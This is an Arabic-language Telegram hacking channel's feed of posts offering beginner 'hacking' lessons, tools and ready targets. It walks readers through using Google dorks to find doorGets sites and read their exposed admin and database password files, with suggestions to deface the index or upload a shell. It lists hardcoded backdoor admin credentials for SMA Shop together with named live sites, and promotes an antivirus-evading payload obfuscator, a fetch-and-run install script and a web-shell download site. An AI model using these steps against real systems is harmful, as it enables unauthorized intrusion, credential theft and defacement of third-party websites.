Project Sigma - Cyber Security From Zero
395 subscribers
38 photos
2 videos
13 files
94 links
القناة الرئيسية

@ProjectSigmaTeam
Download Telegram
Forwarded from Project Sigma
تم إنشاء موقع للفريق وسنتابع شرح الدروس عليه لسهولة وضع الصور والأكواد ضمن الشرح ولأن بعض الدروس طويلة جداً ومن الصعب نشرها على القناة مباشرةً
بالطبع سأضع رابط كل درس على القناة 👍🏻
رابط الموقع
http://nullbytestream.tk
سنعيد نشر الدروس السابقة على الموقع .. وقد أضيف بعض الصور الإضافية للتوضيح
#تعلم_الاختراق
#الدرس_الأول
الرابط
http://adfoc.us/47885071290428

#اختراق_الأجهزة
#الدرس_الأول
الرابط
http://adfoc.us/47885071290652

بعد الدخول إلى الرابط انتظر 5 ثواني ثم اضغط على زر
skip
أعلى ويمين الصفحة
#اختراق_شبكات_الوايفاي
#الدرس_الثاني

الطريقة الاحترافية لاختراق أي شبكة واي فاي .. باستخدام أداة aircrack-ng
الشرح على نظام الكالي لينوكس .. يعمل على أي نظام لينوكس وقد يعمل على التيرمكس حسب الجهاز
رابط الشرح
https://dwindly.io/nLKxmX

بعد الدخول إلى الرابط اضغط continue وانتظر 5 ثواني ثم اضغط get link
#NullByteStream_team
طريقة التحقق مما إذا كان كرت الوايرلس لجهازك يدعم الmonitoring ( لاختراق شبكات الواي فاي - الدرس السابق )

بالأمر التالي :
iw list
هذا الأمر يسرد قائمة بالأوامر والأوضاع المتوفرة لكرت الوايرلس
بعد كتابة الأمر ستظهر قائمة طويلة .. إذا وجدت كلمة monitor فالجهاز يدعمها
كما في الصورة في الأسفل 👇🏻

#NullByteStream_team
#تعلم_الاختراق
#الدرس_السادس
ثغرة Sql Injection
مقدمة في ثغرة حقن قواعد البيانات

هذا الموضوع ضخم جداً .. ولشرحه بشكل جيد وكامل قمت بتقسيمه إلى عدة أجزاء
#القسم_الأول
رابط الشرح
http://dwindly.io/nRb1JE
بعد الدخول للرابط اضغط continue وانتظر 5 ثواني ثم اضغط get link

#NullByteStream_team
رابط تحميل تطبيق DroidSqli للأندرويد لاستغلال ثغرة Sql Injection
تطبيق حقن قواعد البيانات للأندرويد
كل ما عليك فعله هو وضع رابط الموقع المصاب وضغط inject وسيقوم بكل العمل ويجلب لك قاعدة البيانات جاهزة
رابط التحميل
https://dwindly.io/nRpzpd

#NullByteStream_team
تثبيت الميتاسبلويت على التيرمكس بسهولة وبدون أي مشاكل
اكتب الأوامر التالية بالترتيب :

wget https://Auxilus.github.io/metasploit.sh

bash metasploit.sh

ستقوم الأداة بتحميل وتثبيت كل متطلبات البرنامج تلقائياً
بعد الانتهاء اكتب الأمر
msfconsole
لتشغيل الأداة
#NullByteStream_team
Quick Script Encryption Tool - V1.0
أداة تشفير سكريبتات البايثون ( من تصميمي ) لتشفير بايلودات البايثون وإخفائها عن برامج الحماية بشكل كامل
أو لحماية برنامجك من التعديل بسهولة

الأداة تدعم التشفير عدة مرات لنفس الملف لجعل فكه أصعب
أوامر التحميل
wget http://nullbytestream.tk/files/quick_encryption_tool.py

chmod 777 quick_encryption_tool.py

python2 quick_encryption_tool.py


الأداة تحتاج مترجم البايثون الإصدار الثاني .. إذا واجهت مشكلة في تشغيلها اكتب الأمر
apt-get install python2


بعد تشغيلها أدخل مسار الملف ثم أدخل عدد مرات التشفير ( الافتراضي 5 ) بعد الانتهاء ستقوم الأداة بعرض مسار الملف المشفر

#NullByteStream_team
رابط تحميل أداة Droid Sqli لمن واجه مشاكل في الدخول إلى الرابط السابق

http://www.mediafire.com/file/046x6da3pr69nbb/DriodSQLi-net.edgard.droidsqli-1-v1.0.apk

#NullByteStream_team
#تعلم_الاختراق
#الدرس_السادس
ثغرة Sql Injection

لمن واجه مشاكل في الدخول إلى رابط الدرس .. هذا الرابط الجديد المباشر
http://nullbytestream.tk/articles.php?id=929963882081210624

#NullByteStream_team
ملاحظات عن نظام لينوكس
msfpc
أمر تشغيل برنامج msfpc
مثلاً
msfconsole
سيقوم بتشغيل أداة الميتاسبلويت
هذا الملف التنفيذي msfconsole موجود في مسار محدد
/usr/bin
أو
/usr/sbin
حسب نظام جهازك
ولكن الفكرة أنه عند إضافة أي برنامج إلى هذا المجلد يمكنك تشغيله من أي مكان بكتابة اسمه فقط


أما
./filename
فهم أمر تشغيل الملف filename الموجود في المسار "نفسه"
لأنك وضعت /. قبل الاسم
أي إذا أردنا فتح ملف موجود هنا
/sdcard/folder/prog.sh
نغير المسار أولاً إلى داخل المجلد
cd /sdcard/folder
ثم نفتح الملف
./prog.sh
فإذا كتبنا الأمر الأخير بدون تغيير المسار لن يتم تشغيل البرنامج وسيظهر خطأ أن الملف غير موجود
بينما إذا قمت بنسخه إلى مجلد
/usr/bin
فيمكنك تشغيله فوراً بكتابة اسمه
prog
بدون /.
بالطبع قد تحتاج لتحويله لصيغة تنفيذية أو إنشاء launcher لا يهم .. وضعت هذه الأمثلة للفهم فقط
#NullByteStream_team
Forwarded from Project Sigma (ÃŕMąŃđÒ)
يسمح بنشر أي شرح من شروحاتي على أي قناة أخرى ولكن عن طريق إعادة التوجيه أو بذكر رابط القناة فقط
رابط القناة التي نقلت الشرح منها
#ArMaNdO
Forwarded from Project Sigma - Advanced PT (ÃŕMąŃđÒ)
Quick Script Encryption Tool - v1.0

تم إطلاق النسخة الخاصة بنظام الويندوز .. رابط التحميل

http://nullbytestream.tk/files/Quick_Script_Encryption_Tool_1.0.zip

#NullByteStream_team
ثغرة بسيطة وسهلة للتجريب
الثغرة في سكريبت Doorgets
هذا المبرمج قام بتصميم السكريبت بطريقة يخزن فيها أسماء المستخدمين وكلمات السر كلها ضمن ملف بين ملفات الموقع (لا أعلم بم كان يفكر) وبهذه الطريقة يمكن الوصول إلى ملف كلمات السر من المتصفح
http://site.com/setup/temp/admin.php
(ملف كلمات سر لوحة التحكم)

http://site.com/setup/temp/database.php
(ملف كلمات سر قاعدة البيانات)

أظن السبب أنه لم يصممه بطريقة يمسح ملفات التثبيت بعد الانتهاء من تثبيت السكريبت على الموقع

أولاً : ابحث عن موقع مصاب في غوغل .. الدورك :
"Powered with doorGets " مع إشارات الاقتباس

ثانياً : اختر أحد المواقع .. انسخ عنوان الموقع
http://site.com
وأضف بعدها مسار ملف الإعدادات
http://site.com/setup/temp/admin.php

ستجد اسم المستخدم وكلمة السر
الآن عد إلى الصفحة الرئيسية للموقع للدخول إلى الحساب
http://site.com
اضغط على رمز 🙍‍♂️ أعلى ويمين الصفحة ثم اضغط sign in
أدخل اسم المستخدم وكلمة السر التي حصلت عليها ... ستجد نفسك داخل صفحة إدارة الموقع ... يمكنك إضافة مقالات أو إرسال رسائل لجميع المشتركين أو حتى يمكنك تغيير الإندكس (الindex هو الصفحة الرئيسية في كل مجلد بالموقع .. فعندما تدخل إلى الرابط
site.com
فإنك في الحقيقة تدخل إلى صفحة
site.com/index.php
قد يكون ملف الإندكس بامتداد php أو html , htm ........)
فعندما تغير ملف الإندكس الأساسي عندها سيظهر النص الذي تدخله لكل شخص يدخل إلى الموقع
قد تتمكن من رفع شيل لأنه يوجد عدة أماكن لرفع الملفات - جربها -

بالنسبة لأصحاب الخبرة الجيدة يمكنك الحصول على معلومات قاعدة البيانات من هنا
site.com/setup/temp/database.php
والتي تشمل عنوان الآي بي - اسم المستخدم - كلمة السر وإصدار قاعدة البيانات .. يمكنك الدخول إليها باستخدام برامج مثل hexorbase للكالي لينوكس

#Happy_Hacking 🙂
#NullByteStream_team
#اختراق_الأجهزة
#الدرس_الثاني


- اختراق الأجهزة البعيدة عبر شبكة الانترنت باستخدام بايلودات الميتاسبلويت Metasploit
- أفضل بديل لأداة ngrok
رابط الشرح
http://nullbytestream.tk/articles.php?id=256860720925033088

#NullByteStream_team
مجموعة مواقع مصابة للتجريب
هذا النوع من الثغرات يسمى backdoor account وهو عندما يقوم مصمم سكريبت الموقع بإضافة حساب إدارة مخفي ضمن كود السكريبت .. وهكذا يمكن الدخول إلى أي موقع يحوي هذا السكريبت عن طريق هذا الحساب

الدورك :
"© SMA Shop. All rights reserved."
أو
" product/minion-crazy "

بعد اختيار موقع والدخول إليه ندخل إلى لوحة التحكم
/admin
اسم المستخدم وكلمة السر :
owner@tecdiary.com
12345678

أو

admin@tecdiary.com
12345678

ستدخل إلى لوحة تحكم الموقع مباشرةً .. هذه المواقع هي مواقع تجارية shop

مواقع مصابة :
http://app.webagency.pk
لوحة التحكم :
http://app.webagency.pk/admin/

موقع ثاني :
http://sma.tecdiary.com
http://sma.tecdiary.com/admin

#NullByteStream_team
expoilt
موقع يحوي مجموعة من أقوى الشلات للتحميل
لرفعها على المواقع والتحكم بها
رابط الموقع
http://www.expoilt.com/

#NullByteStream_team
نسخة تلغرام الخاصة بنظام لينوكس
لا تحتاج إلى تثبيت